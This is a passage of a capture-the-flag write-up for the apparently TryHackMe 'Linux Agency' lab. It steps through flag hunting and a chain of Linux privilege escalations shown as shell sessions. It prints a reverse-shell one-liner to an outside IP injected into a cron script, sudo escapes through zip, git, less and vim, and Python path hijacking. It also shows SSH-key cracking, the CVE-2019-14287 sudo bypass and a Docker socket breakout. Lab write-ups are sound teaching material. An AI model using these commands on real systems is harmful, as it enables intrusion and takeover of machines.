- For this task, we have a long file name with multiple extensions. In reality, these multiple extensions are only to distract us. We have to only decode the last extension that is .gz. I used the gunzip to do that. Once decoded, we are presented with a png file. Used the strings command again to reveal the flag.
mission26@linuxagency:~$ su mission27
Password:
mission27@linuxagency:/home/mission26$ cd ..
mission27@linuxagency:/home$ cd mission27
mission27@linuxagency:~$ ls -la
total 20
drwxr-x--- 2 mission27 mission27 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission27 mission27 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission27 mission27 3771 Jan 12 2021 .bashrc
-rw-r--r-- 1 mission27 mission27 136 Jan 12 2021 flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png.gz
-rw-r--r-- 1 mission27 mission27 807 Jan 12 2021 .profile
s.zip.gz.jpg.png.gz y:~$ gunzip flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css
mission27@linuxagency:~$ ls -l
total 4
-rw-r--r-- 1 mission27 mission27 51 Jan 12 2021 flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png
ss.zip.gz.jpg.png ncy:~$ strings flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.cs
GIF87a
mission28{03556f8ca983ef4dc26d2055aef9770f}
mission27@linuxagency:~$ 
mission28{03556f8ca983ef4dc26d2055aef9770f}Question 29 – What is the mission29 flag?
- In this one, we are welcomed by a ruby interpreter as soon as we login. Further, we break the interactive session using exec command to spawn the bash shell. Finally got txt.galf which holds the flag but in reverse condition. Reverse the same to get the flag using cyberchef.
mission27@linuxagency:~$ su mission28
Password:
irb(main):002:0> exec "/bin/bash"
mission28@linuxagency:/home/mission27$ cd ..
mission28@linuxagency:/home$ cd mission28
mission28@linuxagency:~$ ls
examples.desktop txt.galf
mission28@linuxagency:~$ ls -la
total 40
drwxr-x--- 3 mission28 mission28 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission28 mission28 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission28 mission28 220 Jan 12 2021 .bash_logout
-rw-r--r-- 1 mission28 mission28 3771 Jan 12 2021 .bashrc
-rw-r--r-- 1 mission28 mission28 8980 Jan 12 2021 examples.desktop
drwxr-xr-x 3 mission28 mission28 4096 Jan 12 2021 .local
-rw-r--r-- 1 mission28 mission28 807 Jan 12 2021 .profile
-r-------- 1 mission28 mission28 44 Jan 12 2021 txt.galf
mission28@linuxagency:~$ cat txt.galf
}1fff2ad47eb52e68523621b8d50b2918{92noissim
mission28@linuxagency:~$ 
mission29{8192b05d8b12632586e25be74da2fff1}Question 30 – What is the mission30 flag?
- Moving onto this task, we found a folder named bludit. Got inside it and access the .htpasswd file which gives us our password.
mission28@linuxagency:~$ su mission29
Password:
mission29@linuxagency:/home/mission28$ cd ..
mission29@linuxagency:/home$ cd mission29
mission29@linuxagency:~$ ls -la
total 20
drwxr-x--- 3 mission29 mission29 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission29 mission29 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission29 mission29 3771 Jan 12 2021 .bashrc
drwxr-xr-x 7 mission29 mission29 4096 Jan 12 2021 bludit
-rw-r--r-- 1 mission29 mission29 807 Jan 12 2021 .profile
mission29@linuxagency:~$ cd bludit/
mission29@linuxagency:~/bludit$ ls -la
total 44
drwxr-xr-x 7 mission29 mission29 4096 Jan 12 2021 .
drwxr-x--- 3 mission29 mission29 4096 Jan 12 2021 ..
drwxr-xr-x 2 mission29 mission29 4096 Jan 12 2021 bl-content
drwxr-xr-x 10 mission29 mission29 4096 Jan 12 2021 bl-kernel
drwxr-xr-x 2 mission29 mission29 4096 Jan 12 2021 bl-languages
drwxr-xr-x 27 mission29 mission29 4096 Jan 12 2021 bl-plugins
drwxr-xr-x 4 mission29 mission29 4096 Jan 12 2021 bl-themes
-rw-r--r-- 1 mission29 mission29 394 Jan 12 2021 .htaccess
-rw-r--r-- 1 mission29 mission29 44 Jan 12 2021 .htpasswd
-rw-r--r-- 1 mission29 mission29 900 Jan 12 2021 index.php
-rw-r--r-- 1 mission29 mission29 1083 Jan 12 2021 LICENSE
mission29@linuxagency:~/bludit$ cat .htaccess
AddDefaultCharset UTF-8
<IfModule mod_rewrite.c>
# Enable rewrite rules
RewriteEngine on
# Base directory
#RewriteBase /
# Deny direct access to the next directories
RewriteRule ^bl-content/(databases|workspaces|pages|tmp)/.*$ - [R=404,L]
# All URL process by index.php
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*) index.php [PT,L]
</IfModule>mission29@linuxagency:~/bludit$ cat .htpasswd
mission30{d25b4c9fac38411d2fcb4796171bda6e}
mission29@linuxagency:~/bludit$ 
mission30{d25b4c9fac38411d2fcb4796171bda6e}Question 31 – What is viktor’s Flag?
- For this one, we moved to the escalator folder and found a folder name .git. Used the same to reveal the log file.
mission29@linuxagency:/home$ su mission30
Password:
mission30@linuxagency:/home$ cd mission30
mission30@linuxagency:~$ ls -la
total 36
drwxr-x--- 3 mission30 mission30 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission30 mission30 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission30 mission30 220 Jan 12 2021 .bash_logout
-rw-r--r-- 1 mission30 mission30 3771 Jan 12 2021 .bashrc
drwxr-xr-x 3 mission30 mission30 4096 Jan 12 2021 Escalator
-rw-r--r-- 1 mission30 mission30 8980 Jan 12 2021 examples.desktop
-rw-r--r-- 1 mission30 mission30 807 Jan 12 2021 .profile
mission30@linuxagency:~$ cd Escalator/
mission30@linuxagency:~/Escalator$ ls -l
total 4
-rw-r--r-- 1 mission30 mission30 35 Jan 12 2021 sources.py
mission30@linuxagency:~/Escalator$ cat sources.py
mission30@linuxagency:~/Escalator/.git$ git log
commit 24cbf44a9cb0e65883b3f76ef5533a2b2ef96497 (HEAD -> master, origin/master)
Author: root <root@Xyan1d3>
Date: Mon Jan 11 15:37:56 2021 +0530
My 1st python Script
commit e0b807dbeb5aba190d6307f072abb60b34425d44
Author: root <root@Xyan1d3>
Date: Mon Jan 11 15:36:40 2021 +0530
Your flag is viktor{b52c60124c0f8f85fe647021122b3d9a}
viktor{b52c60124c0f8f85fe647021122b3d9a}
Task 4 – Privilege Escalation
Question 1 – su into viktor user using viktor’s flag as password
DoneQuestion 2 – What is dalia’s flag?
- As checked the cronjobs entry using crontab, i found one for dalia where a script was running with her privileges. We can exploit it as it is writable by our current user viktor. We have to inject our reverse shell into the file to get a shell at our attacking machine. For this, you have to perform a hit or miss approach as the script changes on its own. For this, i have spam the reverse shell one-liner into the script rapidly and on the particular time to get the reverse shell and the flag.
viktor@linuxagency:/home$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * dalia sleep 30;/opt/scripts/47.sh
* * * * * root echo "IyEvYmluL2Jhc2gKI2VjaG8gIkhlbGxvIDQ3IgpybSAtcmYgL2Rldi9zaG0vCiNlY2hvICJIZXJlIHRpbWUgaXMgYSBncmVhdCBtYXR0ZXIgb2YgZXNzZW5jZSIKcm0gLXJmIC90bXAvCg==" | base64 -d > /opt/scripts/47.sh;chown viktor:viktor /opt/scripts/47.sh;chmod +x /opt/scripts/47.sh;
viktor@linuxagency:/opt/scripts$ cat 47.sh
#!/bin/bash
#echo "Hello 47"
rm -rf /dev/shm/
#echo "Here time is a great matter of essence"
rm -rf /tmp/
bash -i >& /dev/tcp/10.18.11.103/1234 0>&1
viktor@linuxagency:/opt/scripts$ echo "bash -i >& /dev/tcp/10.18.11.103/1234 0>&1">> 47.sh
wh1terose@fsociety:~$ nc -lvnp 1234
Listening on 0.0.0.0 1234
Connection received on 10.10.62.203 53916
bash: cannot set terminal process group (5082): Inappropriate ioctl for device
bash: no job control in this shell
dalia@linuxagency:~$ ls
ls
examples.desktop
flag.txt
dalia@linuxagency:~$ cat flag.txt
cat flag.txt
dalia{4a94a7a7bb4a819a63a33979926c77dc}
dalia@linuxagency:~$ 
dalia{4a94a7a7bb4a819a63a33979926c77dc}Question 3 – What is silvio’s flag?
- For this one, we checked the sudo misconfiguration on the server and as per the output, the user silvio can run zip binary with elevate privileges. Uses the same exploit from GTFObins and captured the flag.
dalia@linuxagency:/home$ sudo -l
Matching Defaults entries for dalia on linuxagency:
env_reset, env_file=/etc/sudoenv, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User dalia may run the following commands on linuxagency:
(silvio) NOPASSWD: /usr/bin/zip
dalia@linuxagency:/home$ TF=$(mktemp -u)
dalia@linuxagency:/home$ sudo -u silvio zip $TF /etc/hosts -T -TT 'sh #'
$ id
uid=1032(silvio) gid=1032(silvio) groups=1032(silvio)
$ python -c 'import pty;pty.spawn("/bin/bash")'
silvio@linuxagency:/home$ cd silvio/
silvio@linuxagency:~$ ls
examples.desktop flag.txt
silvio@linuxagency:~$ cat flag.txt
silvio{657b4d058c03ab9988875bc937f9c2ef}
silvio@linuxagency:~
silvio{657b4d058c03ab9988875bc937f9c2ef}Question 4 – What is reza’s flag?
- Next up we have reza, we tried to check the sudo misconfigurations again and found one in the git binary. To exploit it used GTFObins again. Run the exploit as reza got the user’s shell and flag.
silvio@linuxagency:~$ sudo -l
Matching Defaults entries for silvio on linuxagency:
env_reset, env_file=/etc/sudoenv, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User silvio may run the following commands on linuxagency:
(reza) SETENV: NOPASSWD: /usr/bin/git
silvio@linuxagency:~$ sudo -u reza PAGER='sh -c "exec sh 0<&1"' git -p help
$ id
uid=1033(reza) gid=1033(reza) groups=1033(reza)
$ python -c 'import pty;pty.spawn("/bin/bash")'
reza@linuxagency:/home/silvio$ cd ..
reza@linuxagency:/home$ cd reza/
reza@linuxagency:~$ ls
examples.desktop flag.txt
reza@linuxagency:~$ cat fla
cat: fla: No such file or directory
reza@linuxagency:~$ cat flag.txt
reza{2f1901644eda75306f3142d837b80d3e}
reza@linuxagency:~$ 
reza{2f1901644eda75306f3142d837b80d3e}Question 5 – What is jordan’s flag?
- Well, this was a pain in the ass for a moment. We have to exploit the python module in this by leveraging path hijacking vulnerability. The Gun-shop.py file requires a shop.py module to run. We can insert a reverse shell in shop.py and execute it with the help of the main file to get the shell. For the flag, we have to reverse it, i have used cyberchef for it.
reza@linuxagency:/home$ sudo -l
Matching Defaults entries for reza on linuxagency:
env_reset, env_file=/etc/sudoenv, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User reza may run the following commands on linuxagency:
(jordan) SETENV: NOPASSWD: /opt/scripts/Gun-Shop.py
reza@linuxagency:/tmp$ touch shop.py
reza@linuxagency:/tmp$ echo "import os" > shop.py
reza@linuxagency:/tmp$ echo "os.system('/bin/bash')" >> shop.py
reza@linuxagency:/tmp$ cat shop.py
import os
os.system('/bin/bash')
reza@linuxagency:/tmp$ sudo -u jordan PYTHONPATH=/tmp/ /opt/scripts/Gun-Shop.py
jordan@linuxagency:/tmp$ cat /home/jordan/flag.txt
}3c3e9f8796493b98285b9c13c3b4cbcf{nadroj
jordan@linuxagency:/tmp$ 
jordan{fcbc4b3c31c9b58289b3946978f9e3c3}Question 6 – What is ken’s flag?
- We checked again for any sudo misconfigurations. Found out that the binary less can be used by user ken without any password. So, read the flag using the less binary with the privileges of user “ken”. For the shell access, used GTFObins again and got shell for ken using less.
jordan@linuxagency:/tmp$ sudo -l
Matching Defaults entries for jordan on linuxagency:
env_reset, env_file=/etc/sudoenv, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jordan may run the following commands on linuxagency:
(ken) NOPASSWD: /usr/bin/less
jordan@linuxagency:/tmp$ sudo -u ken /usr/bin/less /home/ken/flag.txt
WARNING: terminal is not fully functional
ken{4115bf456d1aaf012ed4550c418ba99f}
/home/ken/flag.txt (END)
jordan@linuxagency:/tmp$ sudo -u ken less /etc/profile
WARNING: terminal is not fully functional
# /etc/profile: system-wide .profile file for the Bourne shell (sh(1))
# and Bourne compatible shells (bash(1), ksh(1), ash(1), ...).
if [ "${PS1-}" ]; then
if [ "${BASH-}" ] && [ "$BASH" != "/bin/sh" ]; then
# The file bash.bashrc already sets the default PS1.
# PS1='\h:\w\$ '
if [ -f /etc/bash.bashrc ]; then
. /etc/bash.bashrc
fi
else
if [ "`id -u`" -eq 0 ]; then
PS1='# '
else
PS1='$ '
fi
fi
fi
if [ -d /etc/profile.d ]; then
for i in /etc/profile.d/*.sh; do
if [ -r $i ]; then
. $i
!/bin/shfile
$ id
uid=1036(ken) gid=1036(ken) groups=1036(ken)
$ python -c 'import pty;pty.spawn("/bin/bash")'
ken@linuxagency:/tmp$ 
ken{4115bf456d1aaf012ed4550c418ba99f}Question 7 – What is sean’s flag?
- To get the flag for sean, we exploited the vim binary to get the reverse shell however the flag was not under the home directory of the user. After a little bit research, found out that the user belongs to the ADM group and the flag might reside in /var/log. Using grep to filter out anything useful, we got our flag. Along with that, we found another string encoded in base64, which once decoded reveal password of penelope.
ken@linuxagency:/tmp$ sudo -l
Matching Defaults entries for ken on linuxagency:
env_reset, env_file=/etc/sudoenv, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User ken may run the following commands on linuxagency:
(sean) NOPASSWD: /usr/bin/vim
ken@linuxagency:/tmp$ sudo -u sean vim -c ':!/bin/sh'
E558: Terminal entry not found in terminfo
'unknown' not known. Available builtin terminals are:
builtin_amiga
builtin_beos-ansi
builtin_ansi
builtin_pcansi
builtin_win32
builtin_vt320
builtin_vt52
builtin_xterm
builtin_iris-ansi
builtin_debug
builtin_dumb
defaulting to 'ansi'
:!/bin/sh
$ id
uid=1037(sean) gid=1037(sean) groups=1037(sean),4(adm)
$ python -c 'import pty;pty.spawn("/bin/bash")'
sean@linuxagency:/tmp$ cd /home/sean/
sean@linuxagency:~$ ls
examples.desktop
sean@linuxagency:/var/log$ grep -rn “sean{“ /var/log 2>/dev/null
sean@linuxagency:/var/log$ grep -R sean ./* 2>/dev/null
./auth.log:Jun 20 11:22:15 localhost sudo: ken : TTY=pts/0 ; PWD=/tmp ; USER=sean ; COMMAND=/usr/bin/vim -c :!/bin/sh
Binary file ./journal/e5c33f65843d4fde84404ee7ae1a0806/user-1036.journal matches
Binary file ./journal/e5c33f65843d4fde84404ee7ae1a0806/system.journal matches
Binary file ./journal/e5c33f65843d4fde84404ee7ae1a0806/user-1037.journal matches
./kern.log:Jun 20 11:31:00 localhost kernel: [13845.319395] ptrace attach of "vim -c :!/bin/sh"[6678] was attempted by "grep --color=auto -r sean /bin /boot /cdrom /dev /etc /flag.txt /home /initrd.img /initrd.img.old /lib /lib64 /lost+found /media /mnt /opt /proc /root /run /sbin /snap /srv /swapfile /sys /tmp /usr /var /vmlinuz"[11268]
./kern.log:Jun 20 11:31:00 localhost kernel: [13845.319448] ptrace attach of "vim -c :!/bin/sh"[6678] was attempted by "grep --color=auto -r sean /bin /boot /cdrom /dev /etc /flag.txt /home /initrd.img /initrd.img.old /lib /lib64 /lost+found /media /mnt /opt /proc /root /run /sbin /snap /srv /swapfile /sys /tmp /usr /var /vmlinuz"[11268]
./kern.log:Jun 20 11:31:00 localhost kernel: [13845.319874] ptrace attach of "vim -c :!/bin/sh"[6678] was attempted by "grep --color=auto -r sean /bin /boot /cdrom /dev /etc /flag.txt /home /initrd.img /initrd.img.old /lib /lib64 /lost+found /media /mnt /opt /proc /root /run /sbin /snap /srv /swapfile /sys /tmp /usr /var /vmlinuz"[11268]
./syslog:Jun 20 11:31:00 localhost kernel: [13845.319395] ptrace attach of "vim -c :!/bin/sh"[6678] was attempted by "grep --color=auto -r sean /bin /boot /cdrom /dev /etc /flag.txt /home /initrd.img /initrd.img.old /lib /lib64 /lost+found /media /mnt /opt /proc /root /run /sbin /snap /srv /swapfile /sys /tmp /usr /var /vmlinuz"[11268]
./syslog:Jun 20 11:31:00 localhost kernel: [13845.319448] ptrace attach of "vim -c :!/bin/sh"[6678] was attempted by "grep --color=auto -r sean /bin /boot /cdrom /dev /etc /flag.txt /home /initrd.img /initrd.img.old /lib /lib64 /lost+found /media /mnt /opt /proc /root /run /sbin /snap /srv /swapfile /sys /tmp /usr /var /vmlinuz"[11268]
./syslog:Jun 20 11:31:00 localhost kernel: [13845.319874] ptrace attach of "vim -c :!/bin/sh"[6678] was attempted by "grep --color=auto -r sean /bin /boot /cdrom /dev /etc /flag.txt /home /initrd.img /initrd.img.old /lib /lib64 /lost+found /media /mnt /opt /proc /root /run /sbin /snap /srv /swapfile /sys /tmp /usr /var /vmlinuz"[11268]
./syslog.bak:Jan 12 02:58:58 ubuntu kernel: [ 0.000000] ACPI: LAPIC_NMI (acpi_id[0x6d] high edge lint[0x1]) : sean{4c5685f4db7966a43cf8e95859801281} VGhlIHBhc3N3b3JkIG9mIHBlbmVsb3BlIGlzIHAzbmVsb3BlCg==
sean@linuxagency:/var/log$ 
sean{4c5685f4db7966a43cf8e95859801281}Question 8 – What is penelope’s flag?
- With the help of the password, we found in our last task. Log into the SSH server and switch the user to penelope with the password – p3nelope and find the flag in the user’s home directory.
agent47@linuxagency:~$ su penelope
Password:
penelope@linuxagency:/home/agent47$ cd ..
penelope@linuxagency:/home$ cd penelope/
penelope@linuxagency:~$ ls -la
total 80
drwxr-x--- 3 penelope penelope 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
-rwsr-sr-x 1 maya maya 39096 Jan 12 2021 base64
lrwxrwxrwx 1 penelope penelope 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 penelope penelope 220 Jan 12 2021 .bash_logout
-rw-r--r-- 1 penelope penelope 3771 Jan 12 2021 .bashrc
-rw-r--r-- 1 penelope penelope 8980 Jan 12 2021 examples.desktop
-r-------- 1 penelope penelope 43 Jan 12 2021 flag.txt
drwx------ 3 penelope penelope 4096 Jan 12 2021 .gnupg
-rw-r--r-- 1 penelope penelope 807 Jan 12 2021 .profile
penelope@linuxagency:~$ cat flag.txt
penelope{2da1c2e9d2bd0004556ae9e107c1d222}
penelope@linuxagency:~$ 
penelope{2da1c2e9d2bd0004556ae9e107c1d222}Question 9 – What is maya’s flag?
- As per the above screenshot of the directory listing for user penelope, we can see a base64 binary that has permissions for user maya and a SUID bit set. I used GTFObins to exploit this binary to read the flag from maya’s home directory.
penelope@linuxagency:~$ ls -la
total 80
drwxr-x--- 3 penelope penelope 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
-rwsr-sr-x 1 maya maya 39096 Jan 12 2021 base64
lrwxrwxrwx 1 penelope penelope 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 penelope penelope 220 Jan 12 2021 .bash_logout
-rw-r--r-- 1 penelope penelope 3771 Jan 12 2021 .bashrc
-rw-r--r-- 1 penelope penelope 8980 Jan 12 2021 examples.desktop
-r-------- 1 penelope penelope 43 Jan 12 2021 flag.txt
drwx------ 3 penelope penelope 4096 Jan 12 2021 .gnupg
-rw-r--r-- 1 penelope penelope 807 Jan 12 2021 .profile
penelope@linuxagency:~$ LFILE=/home/maya/flag.txt
penelope@linuxagency:~$ ./base64 "$LFILE" | base64 --decode
maya{a66e159374b98f64f89f7c8d458ebb2b}
penelope@linuxagency:~$ 
maya{a66e159374b98f64f89f7c8d458ebb2b}Question 10 – What is robert’s Passphrase?
- Once we are in the maya’s home directory, we can see a file named elusive_targets.txt which reveals that Robert is illegally hacking into our server and we can gain access to his account with an old ssh password backup that we can see in a directory called old_robert_ssh. Peeking into the directory reveals public and private key SSH key pairs of robert. I dumped the private key into the local machine and use SSH2john to convert the file into john crackable format. Firing up john on it reveals the password. – industryweapon
root@ip-10-10-230-84:/opt/john# ./ssh2john.py id_rsa > id_rsa.hash root@ip-10-10-230-84:/# john --wordlist=/usr/share/wordlists/rockyou.txt /opt/john/id_rsa.hash Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl" Use the "--format=ssh-opencl" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status industryweapon (id_rsa) 1g 0:00:00:16 DONE (2023-06-20 20:46) 0.06093g/s 873960p/s 873960c/s 873960C/s *7¡Vamos! Session completed.
industryweaponQuestion 11 – What is user.txt?
- Once I got the robert’s password, i tried to SSH into the server using the same but no luck. Then, on the maya’s shell, i tried to see the available routes and internal services that are running. There i found out that a port 2222 is running on 127.0.0.1 of the machine. I tried to SSH into it and got success. Now it was time to claim the user flag but it was just a troll.
maya@linuxagency:~$ ss -tulnp Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port udp UNCONN 6144 0 127.0.0.53%lo:53 0.0.0.0:* udp UNCONN 0 0 10.10.62.203%eth0:68 0.0.0.0:* udp UNCONN 4992 0 0.0.0.0:68 0.0.0.0:* udp UNCONN 0 0 0.0.0.0:631 0.0.0.0:* udp UNCONN 25856 0 0.0.0.0:5353 0.0.0.0:* udp UNCONN 0 0 0.0.0.0:59125 0.0.0.0:* udp UNCONN 0 0 [::]:47368 [::]:* udp UNCONN 8448 0 [::]:5353 [::]:* tcp LISTEN 0 128 127.0.0.1:2222 0.0.0.0:* tcp LISTEN 0 128 127.0.0.1:80 0.0.0.0:* tcp LISTEN 0 128 127.0.0.53%lo:53 0.0.0.0:* tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:* tcp LISTEN 0 5 127.0.0.1:631 0.0.0.0:* tcp LISTEN 0 128 127.0.0.1:41791 0.0.0.0:* tcp LISTEN 0 128 [::]:22 [::]:* tcp LISTEN 0 5 [::1]:631 [::]:* maya@linuxagency:~$ ssh -p 2222 [email protected] [email protected]'s password: Last login: Tue Jan 12 17:02:07 2021 from 172.17.0.1 robert@ec96850005d6:~$ ls robert.txt robert@ec96850005d6:~$ cat robert.txt You shall not pass from here!!! I will not allow ICA to take over my world.
- Next i tried to check if any sudo misconfiguration is there, found that all other than root can run /bin/bash command, this type of configuration i have seen before also. So, to cross check i downloaded the linpeas on the target machine and fired it up. Found out that the sudo version is vulnerable to CVE-2019-14287. With the one-liner, i got the root shell and claimed the user flag over there but root was still hiding somewhere.
robert@ec96850005d6:/tmp$ sudo -u#-1 /bin/bash
root@ec96850005d6:/tmp# id
uid=0(root) gid=1000(robert) groups=1000(robert)
root@ec96850005d6:/tmp# cd /root
root@ec96850005d6:/root# ls
success.txt user.txt
root@ec96850005d6:/root# cat user.txt
user{620fb94d32470e1e9dcf8926481efc96}
root@ec96850005d6:/root# cat success.txt
47 you made it!!!
You have made it, Robert has been taught a lesson not to mess with ICA.
Now, Return to our Agency back with some safe route.
All the previous door's have been closed.
Good Luck Amigo!
root@ec96850005d6:/root#
user{620fb94d32470e1e9dcf8926481efc96}Question 12 – What is root.txt?
- The root flag was harder than the legs day in the gym. As per the hint given, it was talking about some Blue Whale, assuming that’s for the docker. So, i blindly copy-pasted the docker breakout commands from Hacktricks and eventually got the root shell. Moving into the root director reveals the root flag.
root@ec96850005d6:~# find / -name docker.sock 2>/dev/null
/run/docker.sock
root@ec96850005d6:~# /tmp/docker images #lucky they left this executable in the /tmp dir ;)
REPOSITORY TAG IMAGE ID CREATED SIZE
mangoman latest b5f279024ce0 2 years ago 213MB
root@ec96850005d6:~# /tmp/docker run -it -v /:/host/ mangoman chroot /host/ bash
root@e0c9b28abd75:/# ls
bin cdrom etc home initrd.img.old lib64 media opt root sbin srv sys usr vmlinuz
boot dev flag.txt initrd.img lib lost+found mnt proc run snap swapfile tmp var
root@e0c9b28abd75:/# cd root/
root@e0c9b28abd75:~# ls
message.txt root.txt
root@e0c9b28abd75:~# cat root.txt
root{62ca2110ce7df377872dd9f0797f8476}
root@e0c9b28abd75:~#
root{62ca2110ce7df377872dd9f0797f8476}
Also Read: Tryhackme – LazyAdmin
Conclusion:
So that was “Linux Agency” for you. Quite a long read, i must say. Well, Let’s sum up the room. We started with an initial SSH access on the box. Next, we solved a series of missions and got the flag for the user viktor. The privilege escalation consist of various users at each stage. Tried quite a few techniques and at last break out of the container to get the root flag and the freedom from the Big brother.
